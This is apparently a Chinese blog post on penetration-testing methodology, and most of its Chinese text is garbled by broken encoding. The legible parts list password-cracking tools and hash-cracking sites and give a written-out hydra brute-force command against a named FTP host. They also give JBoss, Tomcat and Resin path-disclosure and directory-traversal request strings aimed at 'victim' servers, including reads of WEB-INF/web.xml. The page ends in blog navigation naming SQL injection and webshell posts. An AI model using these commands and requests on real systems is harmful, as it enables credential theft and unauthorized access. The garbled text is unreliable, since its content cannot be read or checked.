��ʱ��Ŀ��ϵͳ�κη��ö��и�ɻ��ģ��ǲ��˵��ȫû�취��롣��򵥵�˵��һ��ȱ��ȫ��Ե��֤ϵͳ�͵��㰲װ��һ��ܹرյķ��š��ܶ��£�һЩ��ȫ��о��Ա�Դ˲�мһ�ˣ��εİ�ȫ�¹ʽ��֤��ƻ��Ĺ��Դ��С��㣬��Ŀ¼�б��SQLע��ƹ��֤�ȵȡ��˵��һЩר�ŵİ�ȫ��о��Ա��˵��һ��岻�󣬵��Ƕ��һ��ethical hacker��˵��һ��б�Ҫ��Ҿ��󲿷��Ǳ��ġ��

Ŀǰ�ȽϺõ��뱩��ƽ⹤��У�thc-hydra��brutus

>hydra.exe -L users.txt -P passwords.txt -o test.txt -s 2121 www.nosec.org ftp

Ŀǰ��һ��Դ��õĺܹ㷺��Ǿ��rainbow table��˵��Ҳ��һ��HASH��Ӧ��һЩ��վ�ṩ�˸��ַ��񣬶��ƴ洢�ռ��ڶ��G��rainbowcrack��Ƕ��Ѿ��1.3T��
��Դ��ַ�ʽ��ṩ��߷��У�

��ַ ��

rainbowcrack ��Ӧ�˶��ּ��㷨��HASH��

http://gdataonline.com/seekhash.php

http://www.milw0rm.com/cracker/info.php

http://www.hashchecker.com/?_sls=search_hash

http://bokehman.com/cracker/

http://passcracking.ru/

http://md5.neeao.com/ ��Ա�ṩ��MD5��ƽ̨��˵�Ѽ��һЩ��վ��HASH��

http://www.cmd5.com/ ��վ˵��һЩ�Ƚ��˼:��Թ��û��˴��Ż�...Ҳ��֪��Ǽ�, ;)

��Ȼ��Щ��ƽ��Ǳز��ٵģ�Ophcrack��rainbowcrack��˿��һ��cain��L0phtCrack��ƽ�Windows��룩��John the Ripper��ƽ�UNIX/LINUX��룬��Ȼ��ٲ��һ��FindPass...

��豸��һЩĬ��ʺţ��Բ�ѯhttp://www.routerpasswords.com/��http://www.phenoelit-us.org/dpl/dpl.html

��͸��Թ��У�һ��л��Ӵ�һЩOFFICE�ĵ��ұ��ܵĻ��ô��rixler��Ҫȥ�ĵط��ṩ��OFFICE��׼��˲��OFFICE�ĵ��2007��û��Թ��л��ԵĻ��ҷ�һ�ݲ��Խ��˵��лл��΢��ʲô��ˡ��ҵ��˵��Կ��ʹ��RMS�ˡ�

��־��

It is not necessary actually.

7��һ��͸

��DMZ��һ��Ҳ��ȡ��ü�ֵ��Ϣ��Ϊ�˽�һ��ս��Ҫ��н�һ��͸��һ��估����Ч�ķ�ʽ��Sniffץ��Լ��ARP��ƭ��Ȼ��򵥵��Է��ֻ��ϵ�һЩ�ļ��ܿ��ܾͰ��Ҫ��һЩ��ʺš��˵��һ̨Web��ô��󲿷��ҳ��Ĵ��ĳ��ļ��ҵ��ݿ��ʺš��Ҳ��Դ�һЩ��־�ļ��һ��

��֮�⣬��ֱ�ӻص��ڶ��©��ɨ��С�

�ġ��ɱ��

��Ӧ��

��б��嵥��صȼ��
��ϸ��÷��
��
��Ա/��ʱ��/��/��

�塢��Թ��еķ��ռ��

�ڲ��Թ��޿ɱ��Ŀ��ܻᷢ��ܶ��Ԥ��Ͳ��Ԥ��ķ��գ��Է��ṩ��ܴ�ʩ��ϵͳ��ش��Ӱ�졣��һЩ�ɹ��ο��

1. ��ִ��κο��ҵ��жϵĹ��Դ�Ľ��DoS��α��Ĺ��ƻ��

2. ��֤ʱ��ҵ��С��ʱ��С�

3. ��ִ��ǰȷ��ݽ��б��ݡ�

4. ��в��ִ��ǰ��ά��Ա��й�ͨȷ�ϡ�

5. �ڲ��Թ��г��쳣��ʱ��ֹͣ��Բ��ʱ�ָ�ϵͳ��

6. ��ԭʼҵ��ϵͳ��һ��ȫ�ľ��񻷾��ھ��񻷾��Ͻ��͸��ԡ�

�ο��:

��͸��Է��Ƥ�� v1.4
Penetration Testing Framework
Report Template
http://www.phenoelit.de/dpl/dpl.html
http://snakeoillabs.com/downloads/GHDB.xml
http://www.eccouncil.org/Course-Outline/Ethical%20Hacking%20and%20Countermeasures%20Course.htm
http://www.owasp.org/index.php/OWASP_Testing_Project
http://www.red-database-security.com
http://www.petefinnigan.com
http://www.microsoft.com/technet/itshowcase/content/attackandpenetest.mspx

FAQ��

��ݿ�	��б�
Oracle��1521�˿ڣ�: Ŀǰ��Ҫ��·��İ�ȫ��⣺ 1��TNS��򹥻��sid��Ϣй¶,ֹͣ��ȣ� 2��Ĭ��˺�(default password list) 3��SQL INJECTION��봫ͳ��˼��̫һ�� 4��ڱȽ��ˡ�	thc-orakel, tnscmd, oscanner, Getsids, TNSLSNR, lsnrcheck, OAT, Checkpwd, orabf
MS Sql Server��1433��1434�˿ڣ�
Mysql��3306�˿ڣ�
DB2��523��50000��50001��50002��50003�˿ڣ�	db2utils
Informix��1526��1528�˿ڣ�

WEB��	��б�
IIS	IISPUTSCANNER
Tomcat	��/admin��/manager��Ŀ¼��⣬Ŀ¼�б�Ҳ��Tomcat����⡣��5.*�汾�е�http://127.0.0.1/;index.jsp http://www.example.com/foo/\../manager/html http://www.example.com:8080/examples/servlets/servlet/CookieExample?cook... http://www.example.com:8080/servlets-examples/servlet/CookieExample?cook...
JBOSS	jboss��©��٣��ϰ汾��8083�˿��%��ŵ�©�� GET %. HTTP/1.0��Ի�ȡ��·��Ϣ�� GET %server.policy HTTP/1.0��Ի�ȡ��ȫ��ĵ�� ��Ҳ��ֱ�ӷ��GET %org/xxx/lib.class��ȡ��õ�java��ʹ��һЩ��빤�߻�ԭԴ��롣
Apache
Resin	http://victim/C:%5C/ http://victim/resin-doc/viewfile/?file=index.jsp http://victim/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml http://victim/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class http://victim/[path]/[device].[extension] http://victim/%20..\web-inf http://victim/%20 http://victim/[path]/%20.xtp
WebLogic

��ַ	��
rainbowcrack	��Ӧ�˶��ּ��㷨��HASH��
http://gdataonline.com/seekhash.php
http://www.milw0rm.com/cracker/info.php
http://www.hashchecker.com/?_sls=search_hash
http://bokehman.com/cracker/
http://passcracking.ru/
http://md5.neeao.com/	��Ա�ṩ��MD5��ƽ̨��˵�Ѽ��һЩ��վ��HASH��
http://www.cmd5.com/	��վ˵��һЩ�Ƚ��˼:��Թ��û��˴��Ż�...Ҳ��֪��Ǽ�, ;)

�º�����'Blog

EwebEdit

SQL Injection Referansı

΢������3��SQL Injection������⹤��

MSSQL 2005 LOG����webshell

����͵��Ϊ�ԡ�Ů��͵��Ϊɶ��

dvbbs8.2(access/sql)version login.asp remote sql injection

ACCESS�߼�ע��

Access SQLע��ο�

Full SQL Injection Tutorial (MySQL)

����ASP.net��վ�ľ���

��͸����(Penetration Testing)

��͸����(Penetration Testing)

Ŀ¼

�����ƶ�ʵʩ����

���������������

�ġ����ɱ���

�塢���Թ����еķ��ռ����

�ο�����:

FAQ��

�º��'Blog

΢��3��SQL Injection��⹤��

MSSQL 2005 LOG��webshell

��͵��Ϊ�ԡ�Ů��͵��Ϊɶ��

��ASP.net��վ�ľ��

��͸��(Penetration Testing)

��͸��(Penetration Testing)

��ƶ�ʵʩ��

��

�ġ��ɱ��

�塢��Թ��еķ��ռ��

�ο��: